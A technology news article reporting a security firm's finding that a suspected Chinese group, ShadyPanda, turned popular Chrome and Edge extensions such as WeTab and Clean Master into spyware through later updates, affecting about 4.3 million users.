Chinese Hackers Used Legit Browser Extensions to Spy on 4.3 Million Users for 7 Years
A browser extension attack that went undetected for years has affected millions of Google Chrome and Microsoft Edge users. Chinese actors proceeded with long-term planning in order to generate many victims.
Addons have been positioned for years
Like the security company Koi reported a suspected Chinese hacker group called ShadyPanda infiltrated a total of around 4.3 million computers over the course of seven years using initially inconspicuous add-ons. The attackers used a particularly perfidious approach: First they published seemingly harmless productivity tools, collected high popularity, positive reviews and millions of installations over the years – and only later installed malicious updates. Since the major platforms mainly check extensions when they are first submitted, the manipulated versions were able to be distributed largely unnoticed. Even add-ons with “Featured” or “Verified” status were transformed from practical helpers into spy tools. According to Koi, no phishing or deception was necessary – just trusting established extensions was enough to install comprehensive monitoring systems on millions of browsers.
At least five extensions to the network are said to still be available in the Edge Store and together have more than four million installations. According to the researchers, two of them already contain active spying functions. One of the problematic extensions, WeTab, is said to have over three million users alone and transmits extensive data in real time to several servers in China and to Google Analytics.
Several addons still active
Another example is the Chrome and Edge extension “Clean Master” from the provider Starlab Technology. Released between 2018 and 2019, it received official seals of approval and collected over 200,000 installs. In the summer of 2024, ShadyPanda then distributed an update that retrofitted a remote access interface. Although the affected extensions have now been removed from stores, Koi warns that the infrastructure for further attacks remains active.
The malware allows you to reload any JavaScript files, manipulate website content and log your entire surfing behavior. It also has mechanisms designed to trick researchers by simulating harmless behavior when developer tools are opened. Koi sees the incidents as a structural problem in the large marketplaces: Once extensions have been released, they are hardly monitored. This would allow attackers to roll out updates unnoticed at any time – with potentially serious consequences for millions of users.
Digital marketing enthusiast and industry professional in Digital technologies, Technology News, Mobile phones, software, gadgets with vast experience in the tech industry, I have a keen interest in technology, News breaking.
1 thought on “Chinese Hackers Used Legit Browser Extensions to Spy on 4.3 Million Users for 7 Years”